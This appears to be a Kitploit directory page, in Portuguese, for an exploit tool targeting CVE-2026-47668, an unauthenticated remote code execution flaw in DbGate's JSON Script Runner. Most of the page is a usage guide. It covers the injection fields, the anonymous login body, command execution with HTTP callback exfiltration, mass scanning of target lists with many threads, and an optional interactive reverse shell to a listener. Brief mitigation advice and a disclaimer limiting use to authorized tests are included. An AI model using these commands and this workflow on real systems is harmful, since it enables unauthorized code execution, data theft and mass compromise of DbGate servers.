Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-47668 — DbGate Unauthenticated Remote Code Execution | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-47668
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate Unauthenticated Remote Code Execution

Ver Repositório
6há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-47668 — Execução Remota de Código no DbGate

RCE não autenticada no DbGate JSON Script Runner (dbgate-serve ≤ 7.1.8).
Ferramenta de avaliação: CVE-2026-47668.py — apenas para testes autorizados.

CVECVE-2026-47668
GravidadeCrítica
ProdutoDbGate / dbgate-serve
Afetado≤ 7.1.8
Corrigido≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

Vulnerabilidade

Título: Execução Remota de Código não Autenticada no DbGate via JSON Script Runner

Campos controlados pelo usuário (functionName, variableName) são incorporados em JavaScript gerado dinamicamente sem validação adequada. Um atacante pode executar código arbitrário no processo filho do runner Node.js.

Mitigação: Atualize para 7.1.9+. Restrinja o acesso à rede, desabilite autenticação anônima, altere credenciais, revise logs para atividade suspeita em /runners/start.


Contato

Telegram: @KNxploited


Visão Geral da Ferramenta

CVE-2026-47668.py verifica e valida exploração contra instâncias DbGate que você está autorizado a testar.

Modos

Resultados

Diretório de saída: Nx/ (vuln, dispatch, exfil, failed, list_report, arquivos por alvo em exfil/)


Instalação

root@kitploit:~
pip install -r requirements.txt

Requer: Python 3.9+, aiohttp, colorama


Uso

Assistente AUTO (padrão — sem reverse shell)

root@kitploit:~
python CVE-2026-47668.py
Entrada no promptExemplo
URL únicahttp://192.168.1.10:3000
URL + comandohttp://192.168.1.10:3000|id
Lista de alvostargets.txt

CLI — ativar flag

Cada execução CLI deve incluir --cli.

root@kitploit:~
python CVE-2026-47668.py --cli [options]

Alvo único

-u / --url — URL base do alvo

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — comando shell (padrão: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — apenas probe de vulnerabilidade (sem comando)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — vetor de injeção: functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — porta padrão quando a URL não tem porta (padrão: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — use token Bearer existente

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — corpo de login personalizado (padrão: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — timeout HTTP em segundos

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — verificar certificados TLS

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

Callback / exfil (padrão no CLI com --cmd)

--callback-host — IP/hostname que o alvo usa para alcançar seu listener

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — bind local para listener HTTP (padrão: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — porta HTTP exfil (padrão: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — URL de callback externa (desabilita listener interno)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — segundos para aguardar callback (alvo único, padrão: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — enviar saída sem codificação base64

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — exec assíncrono em vez de execSync

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

Varredura em massa (sem reverse shell)

-f / --file — arquivo de lista de alvos

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — workers concorrentes (padrão: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — espera de callback por alvo em massa (padrão: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

Massa + porta padrão personalizada

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

Reverse shell (opcional — apenas alvo único)

Não é necessário para testes normais. Use HTTP exfil (--cmd) para comprovação.

--reverse-shell — alvo se conecta a LHOST:LPORT (omitir valor = IP LAN + porta 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — porta quando --reverse-shell não tem :porta

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — endereço de escuta local

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — aguardar TCP (padrão: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — relay básico stdin/stdout após conexão

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Nota Docker: use um IP alcançável do container DbGate (ex: gateway do host), não apenas 127.0.0.1 no seu PC.


Lista de alvos (targets.txt)

root@kitploit:~
# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • Sem porta → 3000 aplicado automaticamente
  • host|command → substituição de comando por linha
  • Relatório: Nx/list_report.txt

Arquivos de saída


Fluxo de trabalho

  1. POST /auth/login → token Bearer (automático a menos que --token)
  2. Probe → runner aceita injeção
  3. POST /runners/start → executa comando + callback HTTP (ou TCP reverso se habilitado)
  4. Classificar → EXFIL = saída confirmada

Aviso Legal

Apenas para testes de segurança autorizados. Você deve ter permissão explícita para testar qualquer sistema. O autor não é responsável por uso indevido ou ilegal.


By: Nxploited

Baixar ferramenta
ItemDetalhe
EndpointPOST /runners/start
AutenticaçãoBearer necessário; token pode ser obtido via POST /auth/login em implantações anônimas/padrão
InjeçãofunctionName, variableName em comandos assign do JSON
ImpactoExecução de comandos do SO como o usuário do processo DbGate
ModoReverse shellDescrição
AUTONãoUm prompt; token + callback HTTP + padrões
CLIOpcionalControle total via flags
MassNãoEscaneie a partir de targets.txt
--reverse-shellSimVerificação TCP opcional (apenas alvo único)
ResultadoSignificado
FALHAInalcançável, falha de autenticação ou não vulnerável
VULNRunner aceitou apenas o probe
DISPATCHPayload enviado; nenhuma saída confirmada
EXFILCallback recebido — saída de comando confirmada
REVSHTCP reverso conectado (apenas modo opcional)
ArquivoConteúdo
Nx/vuln.txtAlvos vulneráveis (probe OK)
Nx/dispatch.txtPayload enviado, não confirmado
Nx/exfil.txtCallbacks confirmados
Nx/failed.txtAlvos com falha
Nx/exfil/<host>.txtSaída de comando por alvo
Nx/sessions/<id>/summary.jsonResumo da sessão